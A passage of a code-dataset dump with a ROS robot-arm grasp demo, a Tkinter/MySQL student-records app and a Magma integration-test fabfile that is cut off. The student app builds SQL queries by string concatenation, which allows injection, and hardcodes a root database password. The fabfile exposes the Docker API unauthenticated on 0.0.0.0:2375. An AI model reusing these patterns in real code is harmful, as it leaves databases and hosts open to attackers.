self.gripper.set_max_acceleration_scaling_factor(0.5)\n self.gripper.set_max_velocity_scaling_factor(0.5)\n \n # 控制夹爪先回到初始化位置\n self.moveGripper(\"Home\")\n \n ##################\n ##### Grasp #####\n ##################\n\n # Preparation pose\n pos = [0.24, 0.06, 0.25]\n orient = [0, pi/2, 0]\n self.moveArm(pos, orient)\n\n self.moveGripper(\"Open\")\n\n # 获取当前位姿数据最为机械臂运动的起始位姿\n start_pose = self.arm.get_current_pose(self.end_effector_link).pose\n\n print( start_pose )\n\n # 初始化路点列表\n waypoints = []\n \n # 将初始位姿加入路点列表\n waypoints.append(start_pose)\n \n # 设置路点数据,并加入路点列表\n wpose = deepcopy(start_pose)\n wpose.position.z -= 0.05\n waypoints.append(deepcopy(wpose))\n\n wpose.position.z -= 0.05\n waypoints.append(deepcopy(wpose))\n\n # Plan the path by cartesian path planning\n self.cartesianPathPlan(waypoints)\n # Close the gripper to grasp object\n self.moveGripper(\"Closed\")\n\n ####################\n ##### Release #####\n ####################\n\n # 获取当前位姿数据最为机械臂运动的起始位姿\n start_pose = self.arm.get_current_pose(self.end_effector_link).pose\n # 初始化路点列表\n waypoints = []\n \n # 将初始位姿加入路点列表\n waypoints.append(start_pose)\n\n # 设置路点数据,并加入路点列表\n wpose = deepcopy(start_pose)\n wpose.position.z += 0.05\n waypoints.append(deepcopy(wpose))\n\n wpose.position.z += 0.05\n waypoints.append(deepcopy(wpose))\n\n wpose.position.x = 0.24\n wpose.position.y = 0.06\n waypoints.append(deepcopy(wpose))\n\n wpose = deepcopy(start_pose)\n wpose.position.z -= 0.05\n waypoints.append(deepcopy(wpose))\n\n wpose.position.z -= 0.05\n waypoints.append(deepcopy(wpose))\n # Plan the path by cartesian path planning\n self.cartesianPathPlan(waypoints)\n # Open the gripper to release object\n self.moveGripper(\"Open\")\n\n #####################################\n ##### Exit after task finished #####\n #####################################\n\n # 控制机械臂先回到初始化位置\n self.arm.set_named_target('Sleep')\n self.arm.go()\n rospy.sleep(1)\n\n # Close the gripper to 
the Home position\n self.moveGripper(\"Home\")\n \n # 关闭并退出moveit\n moveit_commander.roscpp_shutdown()\n moveit_commander.os._exit(0)\n\n def moveArm(self, xyz, rpy):\n # 设置机械臂工作空间中的目标位姿,位置使用x、y、z坐标描述,\n # 姿态使用四元数描述,基于base_link坐标系\n target_pose = PoseStamped()\n target_pose.header.frame_id = self.reference_frame\n target_pose.header.stamp = rospy.Time.now() \n target_pose.pose.position.x = xyz[0]\n target_pose.pose.position.y = xyz[1]\n target_pose.pose.position.z = xyz[2]\n # target_pose.pose.orientation.w = 1.0\n q_angle = quaternion_from_euler(rpy[0], rpy[1], rpy[2], axes='sxyz')\n q = Quaternion(*q_angle) \n # print(q)\n target_pose.pose.orientation = q\n \n # 设置机器臂当前的状态作为运动初始状态\n self.arm.set_start_state_to_current_state()\n \n # 设置机械臂终端运动的目标位姿\n self.arm.set_pose_target(target_pose, self.end_effector_link)\n \n # 规划运动路径\n plan_success, traj, planning_time, error_code = self.arm.plan()\n \n # 按照规划的运动路径控制机械臂运动\n self.arm.execute(traj)\n rospy.sleep(1)\n\n def moveGripper(self, target_type):\n if target_type != \"Home\" and target_type != \"Closed\" and target_type != \"Open\":\n rospy.logerr(\"Invalid input of the target type: \"+target_type)\n else:\n self.gripper.set_named_target(target_type)\n self.gripper.go()\n rospy.sleep(1)\n\n def cartesianPathPlan(self, waypoints):\n fraction = 0.0 #路径规划覆盖率\n maxtries = 100 #最大尝试规划次数\n attempts = 0 #已经尝试规划次数\n \n # 设置机器臂当前的状态作为运动初始状态\n self.arm.set_start_state_to_current_state()\n \n # 尝试规划一条笛卡尔空间下的路径,依次通过所有路点\n while fraction < 1.0 and attempts < maxtries:\n (plan, fraction) = self.arm.compute_cartesian_path (\n waypoints, # waypoint poses,路点列表\n 0.01, # eef_step,终端步进值\n 0.0, # jump_threshold,跳跃阈值\n True) # avoid_collisions,避障规划\n \n # 尝试次数累加\n attempts += 1\n \n # 打印运动规划进程\n if attempts % 10 == 0:\n rospy.loginfo(\"Still trying after \" + str(attempts) + \" attempts...\")\n \n # 如果路径规划成功(覆盖率100%),则开始控制机械臂运动\n if fraction == 1.0:\n rospy.loginfo(\"Path computed successfully. 
Moving the arm.\")\n self.arm.execute(plan)\n rospy.loginfo(\"Path execution complete.\")\n # 如果路径规划失败,则打印失败信息\n else:\n rospy.loginfo(\"Path planning failed with only \" + str(fraction) + \" success after \" + str(maxtries) + \" attempts.\") \n\n rospy.sleep(1)\n\nif __name__ == \"__main__\":\n try:\n MoveItCartesianDemo()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"Joyyy821/warehouse-manipulation","sub_path":"src/interbotix_demos/src/moveit_cartesian_demo.py","file_name":"moveit_cartesian_demo.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13935373795","text":"import tkinter as Tk\nfrom tkinter import Button, Entry, Frame, Label, Scrollbar, StringVar, font\nfrom tkinter.constants import BOTH, BOTTOM, CHECKBUTTON, END, GROOVE, HORIZONTAL, RIDGE, RIGHT, SUNKEN, TOP, VERTICAL, X\nfrom typing import Text\nfrom tkinter import ttk\nfrom tkinter import Text\nimport mysql.connector\nimport requests\nfrom tkinter import messagebox\n\n\nclass Student:\n def __init__(self,root):\n self.root=root\n self.root.title(\"Student Managment System\") #Name of the database or title of database\n self.root.geometry(\"1350x700+0+0\") #Size of the sheet\n\n\n '''------------------------ All variables -----------------------------------------------'''\n self.Roll_no_var=StringVar()\n self.Name_var=StringVar()\n self.email_var=StringVar()\n self.gender_var=StringVar()\n self.contact_var=StringVar()\n self.dob_var=StringVar()\n self.Address_var=StringVar()\n self.search_by=StringVar()\n self.search_txt=StringVar()\n \n \n #After created a page \n title=Tk.Label(self.root,text=\"Student Managment System\",bd=10,relief=GROOVE,font=(\"times new roman\",30,\"bold\"),bg=\"DeepSky blue\")\n title.pack(side=TOP,fill=X) #fill=X means the length will be extended end to end in page\n\n #the two frames that we have created in left most part and right most part\n\n '''------------Manage_Frame---------------'''\n Manage_Frame=Frame(self.root,bd=4,relief=RIDGE,bg=\"lightblue\")\n Manage_Frame.place(x=20,y=70,width=350,height=560)\n m_title=Label(Manage_Frame,text=\"Manage Student\",bd=5,relief=SUNKEN,font=(\"times new roman\",20,\"bold\"),bg=\"DeepSky blue3\",fg=\"white\")\n m_title.grid(row=0,columnspan=2,pady=20)\n\n '''--------------------For label of Roll number----------------------------------'''\n lbl_roll=Label(Manage_Frame,text=\"Roll Number\",font=(\"times new roman\",10,\"bold\"))\n lbl_roll.grid(row=1,column=0,pady=10,padx=20,sticky=\"w\")\n\n\n '''--------------------For text Entry of Roll number----------------------------------'''\n txt_Roll=Entry(Manage_Frame,textvariable=self.Roll_no_var,font=(\"times new roman\",10,\"bold\"),bd=5,relief=GROOVE)\n txt_Roll.grid(row=1,column=1,padx=20,pady=10)\n\n '''--------------------For label of name----------------------------------'''\n lbl_name=Label(Manage_Frame,text=\"Name\",font=(\"times new roman\",10,\"bold\"),bd=5)\n lbl_name.grid(row=2,column=0,pady=10,padx=20,sticky=\"w\")\n\n '''--------------------For text Entry of name-------------------------------------------'''\n txt_Name=Entry(Manage_Frame,textvariable=self.Name_var,font=(\"times new roman\",10,\"bold\"),bd=5,relief=GROOVE)\n txt_Name.grid(row=2,column=1,padx=20,pady=10)\n\n \n '''--------------------For label of Email----------------------------------'''\n lbl_email=Label(Manage_Frame,text=\"Email-id\",font=(\"times new roman\",10,\"bold\"),bd=5)\n 
lbl_email.grid(row=3,column=0,pady=10,padx=20,sticky=\"w\")\n\n '''--------------------For text Entry of email-------------------------------------------'''\n txt_email=Entry(Manage_Frame,textvariable=self.email_var,font=(\"times new roman\",10,\"bold\"),bd=5,relief=GROOVE)\n txt_email.grid(row=3,column=1,padx=20,pady=10)\n\n \n '''--------------------For label of Gender----------------------------------'''\n lbl_Gender=Label(Manage_Frame,text=\"Gender\",font=(\"times new roman\",10,\"bold\"),bd=5)\n lbl_Gender.grid(row=4,column=0,pady=10,padx=20,sticky=\"w\")\n\n '''--------------------For selecting Entry of Gender-------------------------------------------'''\n ccmbo_gender=ttk.Combobox(Manage_Frame,textvariable=self.gender_var,font=(\"times new roman\",10,\"bold\"),state=\"readonly\")\n ccmbo_gender['values']=(\"Male\",\"Female\",\"Other\")\n ccmbo_gender.grid(row=4,column=1,padx=20,pady=10)\n\n '''--------------------For label of Contact----------------------------------'''\n lbl_contact=Label(Manage_Frame,text=\"Contact\",font=(\"times new roman\",10,\"bold\"),bd=5)\n lbl_contact.grid(row=5,column=0,pady=10,padx=20,sticky=\"w\")\n\n '''--------------------For text Entry of Contact-------------------------------------------'''\n txt_contact=Entry(Manage_Frame,textvariable=self.contact_var,font=(\"times new roman\",10,\"bold\"),bd=5,relief=GROOVE)\n txt_contact.grid(row=5,column=1,padx=20,pady=10)\n\n \n '''--------------------For label of DOB----------------------------------'''\n lbl_name=Label(Manage_Frame,text=\"DOB\",font=(\"times new roman\",10,\"bold\"),bd=5)\n lbl_name.grid(row=6,column=0,pady=10,padx=20,sticky=\"w\")\n\n '''--------------------For text Entry of DOB-------------------------------------------'''\n txt_Name=Entry(Manage_Frame,textvariable=self.dob_var,font=(\"times new roman\",10,\"bold\"),bd=5,relief=GROOVE)\n txt_Name.grid(row=6,column=1,padx=20,pady=10)\n\n '''--------------------For label of Adderess----------------------------------'''\n lbl_address=Label(Manage_Frame,text=\"Address\",font=(\"times new roman\",10,\"bold\"),bd=5)\n lbl_address.grid(row=7,column=0,pady=10,padx=20,sticky=\"w\")\n\n \n '''--------------------For Entrying of Address-------------------------------------------'''\n self.txt_Address=Text(Manage_Frame,width=25,height=4,font=(\"\",10))\n self.txt_Address.grid(row=7,column=1,padx=20,pady=10,sticky=\"w\")\n\n\n #---------------------------------BUTTON-------------------------------------------\n btn_Frame=Frame(Manage_Frame,bd=4,relief=RIDGE,bg=\"lightblue\")\n btn_Frame.place(x=10,y=480,width=320,height=50)\n\n Add_button=Button(btn_Frame,text=\"Add\",width=5,command=self.add_students).grid(row=0,column=0,padx=15,pady=10)\n Update_button=Button(btn_Frame,text=\"Update\",width=5,command=self.update_data).grid(row=0,column=1,padx=15,pady=10)\n Delete_button=Button(btn_Frame,text=\"Delete\",width=5,command=self.delete_data).grid(row=0,column=2,padx=15,pady=10)\n clear_button=Button(btn_Frame,text=\"Clear\",width=5,command=self.clear).grid(row=0,column=3,padx=15,pady=10)\n\n\n '''------------------------------------Detail Frame------------------------------------'''\n\n Detail_Frame=Frame(self.root,bd=4,relief=RIDGE,bg=\"lightblue\")\n Detail_Frame.place(x=500,y=70,width=750,height=560)\n\n lbl_search=Label(Detail_Frame,text=\"Search By\",font=(\"times new roman\",20,\"bold\"),bd=5)\n lbl_search.grid(row=0,column=0,pady=10,padx=20,sticky=\"w\")\n\n combo_search=ttk.Combobox(Detail_Frame,textvariable=self.search_by,width=10,font=(\"times new 
roman\",10,\"bold\"),state='readonly')\n combo_search['values']=(\"Roll_No\",\"Name\",\"Contact\")\n combo_search.grid(row=0,column=1,padx=10,pady=10)\n\n txt_search=Entry(Detail_Frame,textvariable=self.search_txt,font=(\"times new roman\",10,\"bold\"),bd=5,relief=GROOVE)\n txt_search.grid(row=0,column=2,padx=20,pady=10,sticky=\"w\")\n\n search_btn=Button(Detail_Frame,command=self.search_data,text=\"Search\",width=10).grid(row=0,column=3,padx=10,pady=10)\n showall_btn=Button(Detail_Frame,command=self.fetch_data,text=\"Show All\",width=10).grid(row=0,column=4,padx=10,pady=10)\n\n Tabel_Frame=Frame(Detail_Frame,bd=4,relief=RIDGE,bg=\"lightblue\")\n Tabel_Frame.place(x=20,y=70,width=700,height=470)\n\n scroll_x=Scrollbar(Tabel_Frame,orient=HORIZONTAL)\n scroll_y=Scrollbar(Tabel_Frame,orient=VERTICAL)\n \n self.Student_table=ttk.Treeview(Tabel_Frame,columns=(\"Roll\",\"Name\",\"Email\",\"Gender\",\"Contact\",\"DOB\",\"Address\"),xscrollcommand=scroll_x.set,yscrollcommand=scroll_y.set)\n scroll_x.pack(side=BOTTOM,fill=X)\n scroll_y.pack(side=RIGHT,fill=X)\n scroll_x.config(command=self.Student_table.xview)\n scroll_y.config(command=self.Student_table.yview)\n self.Student_table.heading(\"Roll\",text=\"Roll NO\")\n self.Student_table.heading(\"Name\",text=\"Name\")\n self.Student_table.heading(\"Email\",text=\"Email-id\")\n self.Student_table.heading(\"Gender\",text=\"Gender\")\n self.Student_table.heading(\"Contact\",text=\"Contact No\")\n self.Student_table.heading(\"DOB\",text=\"DOB\")\n self.Student_table.heading(\"Address\",text=\"Address\")\n self.Student_table['show']=\"headings\"\n self.Student_table.column(\"Roll\",width=100)\n self.Student_table.column(\"Name\",width=100)\n self.Student_table.column(\"Email\",width=100)\n self.Student_table.column(\"Gender\",width=100)\n self.Student_table.column(\"Contact\",width=100)\n self.Student_table.column(\"DOB\",width=100)\n self.Student_table.column(\"Address\",width=150)\n self.Student_table.pack(fill=BOTH,expand=1)\n self.Student_table.bind(\"<ButtonRelease-1>\",self.get_cursor)\n self.fetch_data()\n\n\n def add_students(self):\n if self.Roll_no_var.get()==\"\" or self.Name_var.get()==\"\" or self.email_var.get()==\"\":\n messagebox.showerror(\"Error Occured\",\"All fields are required\")\n else: \n #host will define where our host is available database means database name\n con=mysql.connector.connect(host=\"localhost\" ,user=\"root\" ,passwd=\"1234\" ,database=\"stm\" ,auth_plugin='mysql_native_password')\n cur = con.cursor()\n cur.execute(\"insert into students values(%s,%s,%s,%s,%s,%s,%s)\",(self.Roll_no_var.get(),\n self.Name_var.get(), \n self.email_var.get(),\n self.gender_var.get(),\n self.contact_var.get(),\n self.dob_var.get(),\n self.txt_Address.get('1.0',END)\n )) \n con.commit()\n self.fetch_data()\n self.clear()\n con.close()\n messagebox.showinfo(\"Successfully \",\"Record has been inserted\")\n \n \n def fetch_data(self):\n con=mysql.connector.connect(host=\"localhost\",user=\"root\",passwd=\"1234\",database=\"stm\",auth_plugin='mysql_native_password')\n cur = con.cursor()\n cur.execute(\"select * from students\")\n rows=cur.fetchall()\n if len(rows)!=0:\n #deleting data from the table\n self.Student_table.delete(*self.Student_table.get_children())\n for row in rows:\n self.Student_table.insert('',END,values=row)\n con.commit()\n con.close()\n \n def clear(self):\n self.Roll_no_var.set(\"\")\n self.Name_var.set(\"\")\n self.email_var.set(\"\")\n self.gender_var.set(\"\")\n self.contact_var.set(\"\")\n 
self.dob_var.set(\"\")\n self.txt_Address.delete(\"1.0\",END)\n\n\n #to get data when clicked on particular value\n def get_cursor(self,ev):\n cursor_row = self.Student_table.focus()\n contents=self.Student_table.item(cursor_row)\n row = contents['values']\n self.Roll_no_var.set(row[0])\n self.Name_var.set(row[1])\n self.email_var.set(row[2])\n self.gender_var.set(row[3])\n self.contact_var.set(row[4])\n self.dob_var.set(row[5])\n self.txt_Address.delete(\"1.0\",END)\n self.txt_Address.insert(END,row[6])\n\n def update_data(self):\n con=mysql.connector.connect(host=\"localhost\",user=\"root\",passwd=\"1234\",database=\"stm\",auth_plugin='mysql_native_password')\n cur = con.cursor()\n cur.execute(\"update students set name=%s,email=%s,gender=%s,contact=%s,dob=%s,address=%s where roll_no=%s\",(\n self.Name_var.get(), \n self.email_var.get(),\n self.gender_var.get(),\n self.contact_var.get(),\n self.dob_var.get(),\n self.txt_Address.get('1.0',END),\n self.Roll_no_var.get()\n )) \n con.commit()\n self.fetch_data()\n self.clear()\n con.close()\n\n def delete_data(self):\n con=mysql.connector.connect(host=\"localhost\",user=\"root\",passwd=\"1234\",database=\"stm\",auth_plugin='mysql_native_password')\n cur = con.cursor()\n print(self)\n cur.execute(\"DELETE FROM students WHERE roll_no=\" + (self.Roll_no_var.get()))\n con.commit()\n self.fetch_data()\n self.clear()\n con.close() \n \n def search_data(self):\n if self.search_by.get()==\"\":\n messagebox.showerror(\"Error\",\"Please write something\")\n \n else:\n con=mysql.connector.connect(host=\"localhost\",user=\"root\",passwd=\"1234\",database=\"stm\",auth_plugin='mysql_native_password')\n cur = con.cursor()\n cur.execute(\"select * from students where \"+ self.search_by.get() +\" LIKE '%\"+ self.search_txt.get() +\"'\") \n rows = cur.fetchall()\n print(rows)\n if len(rows)!=0:\n self.Student_table.delete(*self.Student_table.get_children())\n for row in rows:\n self.Student_table.insert('',END,values=row)\n con.commit()\n con.close()\n \n \n \n\nroot = Tk.Tk()\nob=Student(root)\nroot.mainloop() \n","repo_name":"Kaushikj14/Student_Data_Management","sub_path":"studentLibMan.py","file_name":"studentLibMan.py","file_ext":"py","file_size_in_byte":14051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"6407707380","text":"from enum import Enum\n\nimport sys\nfrom fabric.api import (cd, env, execute, lcd, local, put, run, settings,\n sudo, shell_env)\nfrom fabric.contrib import files\nsys.path.append('../../orc8r')\n\nfrom tools.fab.hosts import ansible_setup, vagrant_setup\n\nCWAG_ROOT = \"$MAGMA_ROOT/cwf/gateway\"\nCWAG_INTEG_ROOT = \"$MAGMA_ROOT/cwf/gateway/integ_tests\"\nLTE_AGW_ROOT = \"../../lte/gateway\"\n\nCWAG_IP = \"192.168.70.101\"\nCWAG_TEST_IP = \"192.168.128.2\"\nTRF_SERVER_IP = \"192.168.129.42\"\nTRF_SERVER_SUBNET = \"192.168.129.0\"\nCWAG_BR_NAME = \"cwag_br0\"\nCWAG_TEST_BR_NAME = \"cwag_test_br0\"\n\n\nclass SubTests(Enum):\n ALL = \"all\"\n AUTH = \"authenticate\"\n GX = \"gx\"\n GY = \"gy\"\n QOS = \"qos\"\n MULTISESSIONPROXY = \"multi_session_proxy\"\n\n @staticmethod\n def list():\n return list(map(lambda t: t.value, SubTests))\n\n\ndef integ_test(gateway_host=None, test_host=None, trf_host=None,\n transfer_images=False, destroy_vm=False, no_build=False,\n tests_to_run=\"all\", skip_unit_tests=False, test_re=None,\n run_tests=True):\n \"\"\"\n Run the integration tests. 
This defaults to running on local vagrant\n machines, but can also be pointed to an arbitrary host (e.g. amazon) by\n passing \"address:port\" as arguments\n\n gateway_host: The ssh address string of the machine to run the gateway\n services on. Formatted as \"host:port\". If not specified, defaults to\n the `cwag` vagrant box.\n\n test_host: The ssh address string of the machine to run the tests on\n on. Formatted as \"host:port\". If not specified, defaults to the\n `cwag_test` vagrant box.\n\n trf_host: The ssh address string of the machine to run the tests on\n on. Formatted as \"host:port\". If not specified, defaults to the\n `magma_trfserver` vagrant box.\n\n no_build: When set to true, this script will NOT rebuild all docker images.\n \"\"\"\n try:\n tests_to_run = SubTests(tests_to_run)\n except ValueError:\n print(\"{} is not a valid value. We support {}\".format(\n tests_to_run, SubTests.list()))\n return\n\n # Setup the gateway: use the provided gateway if given, else default to the\n # vagrant machine\n _switch_to_vm(gateway_host, \"cwag\", \"cwag_dev.yml\", destroy_vm)\n\n # We will direct coredumps to be placed in this directory\n # Clean up before every run\n if files.exists(\"/var/opt/magma/cores/\"):\n run(\"sudo rm /var/opt/magma/cores/*\", warn_only=True)\n else:\n run(\"sudo mkdir -p /var/opt/magma/cores\", warn_only=True)\n\n if not skip_unit_tests:\n execute(_run_unit_tests)\n\n execute(_set_cwag_configs, \"gateway.mconfig\")\n execute(_add_networkhost_docker)\n cwag_host_to_mac = execute(_get_br_mac, CWAG_BR_NAME)\n host = env.hosts[0]\n cwag_br_mac = cwag_host_to_mac[host]\n\n # Transfer built images from local machine to CWAG host\n if gateway_host or transfer_images:\n execute(_transfer_docker_images)\n else:\n execute(_stop_gateway)\n if not no_build:\n execute(_build_gateway)\n\n execute(_run_gateway)\n # Stop not necessary services for this test case\n execute(_stop_docker_services, [\"pcrf2\", \"ocs2\"])\n\n # Setup the trfserver: use the provided trfserver if given, else default to\n # the vagrant machine\n with lcd(LTE_AGW_ROOT):\n _switch_to_vm(gateway_host, \"magma_trfserver\",\n \"magma_trfserver.yml\", destroy_vm)\n\n execute(_start_trfserver)\n\n # Run the tests: use the provided test machine if given, else default to\n # the vagrant machine\n _switch_to_vm(gateway_host, \"cwag_test\", \"cwag_test.yml\", destroy_vm)\n\n cwag_test_host_to_mac = execute(_get_br_mac, CWAG_TEST_BR_NAME)\n host = env.hosts[0]\n cwag_test_br_mac = cwag_test_host_to_mac[host]\n execute(_set_cwag_test_configs)\n execute(_start_ipfix_controller)\n\n # Get back to the gateway vm to setup static arp\n _switch_to_vm_no_destroy(gateway_host, \"cwag\", \"cwag_dev.yml\")\n execute(_set_cwag_networking, cwag_test_br_mac)\n execute(_check_docker_services)\n\n _switch_to_vm_no_destroy(gateway_host, \"cwag_test\", \"cwag_test.yml\")\n execute(_start_ue_simulator)\n execute(_set_cwag_test_networking, cwag_br_mac)\n\n if run_tests == \"False\":\n execute(_add_docker_host_remote_network_envvar)\n print(\"run_test was set to false. 
Test will not be run\\n\"\n \"You can now run the tests manually from cwag_test\")\n sys.exit(0)\n\n if tests_to_run.value not in SubTests.MULTISESSIONPROXY.value:\n execute(_run_integ_tests, test_host, trf_host, tests_to_run, test_re)\n\n # Setup environment for multi service proxy if required\n if tests_to_run.value in (SubTests.ALL.value,\n SubTests.MULTISESSIONPROXY.value):\n _switch_to_vm_no_destroy(gateway_host, \"cwag\", \"cwag_dev.yml\")\n\n # copy new config and restart the impacted services\n execute(_set_cwag_configs, \"gateway.mconfig.multi_session_proxy\")\n execute(_restart_docker_services, [\"session_proxy\", \"pcrf\", \"ocs\",\n \"pcrf2\", \"ocs2\", \"ingress\"])\n execute(_check_docker_services)\n\n _switch_to_vm_no_destroy(gateway_host, \"cwag_test\", \"cwag_test.yml\")\n execute(_run_integ_tests, test_host, trf_host,\n SubTests.MULTISESSIONPROXY, test_re)\n\n # If we got here means everything work well!!\n if not test_host and not trf_host:\n # Clean up only for now when running locally\n execute(_clean_up)\n print('Integration Test Passed for \"{}\"!'.format(tests_to_run.value))\n sys.exit(0)\n\n\ndef transfer_artifacts(services=\"sessiond session_proxy\", get_core_dump=False):\n \"\"\"\n Fetches service logs from Docker and optionally gets core dumps\n Args:\n services: A list of services for which services logs are requested\n get_core_dump: When set to True, it will fetch a tar of the core dumps\n \"\"\"\n services = services.strip().split(' ')\n print(\"Transferring logs for \" + str(services))\n\n # We do NOT want to destroy this VM after we just set it up...\n vagrant_setup(\"cwag\", False)\n with cd(CWAG_ROOT):\n for service in services:\n run(\"docker logs -t \" + service + \" &> \" + service + \".log\")\n # For vagrant the files should already be in CWAG_ROOT\n if get_core_dump == \"True\":\n execute(_tar_coredump)\n\n\ndef _tar_coredump():\n _switch_to_vm_no_destroy(None, \"cwag\", \"cwag_dev.yml\")\n with cd(CWAG_ROOT):\n core_dump_dir = run('ls /var/opt/magma/cores/')\n num_of_dumps = len(core_dump_dir.split())\n print(f'Found {num_of_dumps} core dumps')\n if num_of_dumps > 0:\n run(\"sudo tar -czvf coredump.tar.gz /var/opt/magma/cores/*\",\n warn_only=True)\n\n\ndef _switch_to_vm(addr, host_name, ansible_file, destroy_vm):\n if not addr:\n vagrant_setup(host_name, destroy_vm)\n else:\n ansible_setup(addr, host_name, ansible_file)\n\n\ndef _switch_to_vm_no_destroy(addr, host_name, ansible_file):\n _switch_to_vm(addr, host_name, ansible_file, False)\n\n\ndef _transfer_docker_images():\n output = local(\"docker images cwf_*\", capture=True)\n for line in output.splitlines():\n if not line.startswith('cwf'):\n continue\n line = line.rstrip(\"\\n\")\n image = line.split(\" \")[0]\n\n local(\"docker save -o /tmp/%s.tar %s\" % (image, image))\n put(\"/tmp/%s.tar\" % image, \"%s.tar\" % image)\n local(\"rm -f /tmp/%s.tar\" % image)\n\n run('docker load -i %s.tar' % image)\n\n\ndef _set_cwag_configs(configfile):\n \"\"\" Set the necessary config overrides \"\"\"\n with cd(CWAG_INTEG_ROOT):\n sudo('mkdir -p /var/opt/magma')\n sudo('mkdir -p /var/opt/magma/configs')\n sudo(\"cp {} /var/opt/magma/configs/gateway.mconfig\".format(configfile))\n\n\ndef _set_cwag_networking(mac):\n sudo('arp -s %s %s' % (CWAG_TEST_IP, mac))\n\n\ndef _get_br_mac(bridge_name):\n mac = run(\"cat /sys/class/net/%s/address\" % bridge_name)\n return mac\n\n\ndef _set_cwag_test_configs():\n \"\"\" Set the necessary test configs \"\"\"\n sudo('mkdir -p /etc/magma')\n # Create empty uesim config\n 
sudo('touch /etc/magma/uesim.yml')\n\n\ndef _start_ipfix_controller():\n \"\"\" Start the IPFIX collector\"\"\"\n with cd(\"$MAGMA_ROOT\"):\n sudo('mkdir -p records')\n sudo('rm -rf records/*')\n sudo('pkill ipfix_collector > /dev/null &', pty=False, warn_only=True)\n sudo('tmux new -d \\'/usr/bin/ipfix_collector -4tu -p 4740 -o /home/vagrant/magma/records\\'')\n\n\ndef _set_cwag_test_networking(mac):\n # Don't error if route already exists\n with settings(warn_only=True):\n sudo('ip route add %s/24 dev %s proto static scope link' %\n (TRF_SERVER_SUBNET, CWAG_TEST_BR_NAME))\n sudo('arp -s %s %s' % (TRF_SERVER_IP, mac))\n\n\ndef _add_networkhost_docker():\n ''' Add network host to docker engine '''\n\n local_host = \"unix:///var/run/docker.sock\"\n nw_host = \"tcp://0.0.0.0:2375\"\n tmp_daemon_json_fn = \"/tmp/daemon.json\"\n docker_cfg_dir = \"/etc/docker/\"\n\n # add daemon json file\n host_cfg = '\\'{\"hosts\": [\\\"%s\\\", \\\"%s\\\"]}\\'' % (local_host, nw_host)\n run(\"\"\"printf %s > %s\"\"\" % (host_cfg, tmp_daemon_json_fn))\n sudo(\"mv %s %s\" % (tmp_daemon_json_fn, docker_cfg_dir))\n\n # modify docker service cmd to remove hosts\n # https://docs.docker.com/config/daemon/#troubleshoot-conflicts-between-the-daemonjson-and-startup-scripts\n tmp_docker_svc_fn = \"/tmp/docker.conf\"\n svc_cmd = \"'[Service]\\nExecStart=\\nExecStart=/usr/bin/dockerd'\"\n svc_cfg_dir = \"/etc/systemd/system/docker.service.d/\"\n sudo(\"mkdir -p %s\" % svc_cfg_dir)\n run(\"printf %s > %s\" % (svc_cmd, tmp_docker_svc_fn))\n sudo(\"mv %s %s\" % (tmp_docker_svc_fn, svc_cfg_dir))\n\n # restart systemd and docker service\n sudo(\"systemctl daemon-reload\")\n sudo(\"systemctl restart docker\")\n\n\ndef _stop_gateway():\n \"\"\" Stop the gateway docker images \"\"\"\n with cd(CWAG_ROOT + '/docker'):\n sudo(' docker-compose'\n ' -f docker-compose.yml'\n ' -f docker-compose.override.yml'\n ' -f docker-compose.integ-test.yml'\n ' down')\n\n\ndef _build_gateway():\n \"\"\" Builds the gateway docker images \"\"\"\n with cd(CWAG_ROOT + '/docker'):\n sudo(' docker-compose'\n ' -f docker-compose.yml'\n ' -f docker-compose.override.yml'\n ' -f docker-compose.nginx.yml'\n ' -f docker-compose.integ-test.yml'\n ' build --parallel')\n\n\ndef _run_gateway():\n \"\"\" Runs the gateway's docker images \"\"\"\n with cd(CWAG_ROOT + '/docker'):\n sudo(' docker-compose'\n ' -f docker-compose.yml'\n ' -f docker-compose.override.yml'\n ' -f docker-compose.integ-test.yml'\n ' up -d ')\n\n\ndef _restart_docker_services(services):\n with cd(CWAG_ROOT + \"/docker\"):\n sudo(\n \" docker-compose\"\n \" -f docker-compose.yml\"\n \" -f docker-compose.override.yml\"\n \" -f docker-compose.nginx.yml\"\n \" -f docker-compose.integ-test.yml\"\n \" restart {}\".format(\" \".join(services))\n )\n\n\ndef _stop_docker_services(services):\n with cd(CWAG_ROOT + \"/docker\"):\n sudo(\n \" docker-compose\"\n \" -f docker-compose.yml\"\n \" -f docker-compose.override.yml\"\n \" -f docker-compose.nginx.yml\"\n \" -f docker-compose.integ-test.yml\"\n \" stop {}\".format(\" \".join(services))\n )\n\n\ndef _check_docker_services():\n with cd(CWAG_ROOT + \"/docker\"):\n run(\n \" DCPS=$(docker ps --format \\\"{{.Names}}\\t{{.Status}}\\\" | grep Restarting);\"\n \" [[ -z \\\"$DCPS\\\" ]] ||\"\n \" ( echo \\\"Container restarting detected.\\\" ; echo \\\"$DCPS\\\"; exit 1 )\"\n )\n\n\ndef _start_ue_simulator():\n \"\"\" Starts the UE Sim Service \"\"\"\n with cd(CWAG_ROOT + '/services/uesim/uesim'):\n run('tmux new -d \\'go run main.go -logtostderr=true 
-v=10\\'')\n\n\ndef _start_trfserver():\n \"\"\" Starts the traffic gen server\"\"\"\n run('nohup iperf3 -s --json -B %s > /dev/null &' % TRF_SERVER_IP, pty=False)\n\n\ndef _run_unit_tests():\n \"\"\" Run the cwag unit tests \"\"\"\n with cd(CWAG_ROOT):\n run('make test')\n\n\ndef _add_docker_host_remote_network_envvar():\n sudo(\n \"grep -q 'DOCKER_HOST=tcp://%s:2375' /etc/environment || \"\n \"echo 'DOCKER_HOST=tcp://%s:2375' >> /etc/environment && \"\n \"echo 'DOCKER_API_VERSION=1.40' >> /etc/environment\" % (CWAG_IP, CWAG_IP))\n\n\ndef _run_integ_tests(test_host, trf_host, tests_to_run: SubTests,\n test_re=None):\n \"\"\" Run the integration tests \"\"\"\n # add docker host environment as well\n shell_env_vars = {\n \"DOCKER_HOST\" : \"tcp://%s:2375\" % CWAG_IP,\n \"DOCKER_API_VERSION\" : \"1.40\",\n }\n if test_re:\n shell_env_vars[\"TESTS\"] = test_re\n\n # QOS take a while to run. Increasing the timeout to 20m\n go_test_cmd = \"go test -v -test.short -timeout 20m\"\n go_test_cmd += \" -tags \" + tests_to_run.value\n if test_re:\n go_test_cmd += \" -run \" + test_re\n\n with cd(CWAG_INTEG_ROOT), shell_env(**shell_env_vars):\n result = run(go_test_cmd, warn_only=True)\n if result.return_code 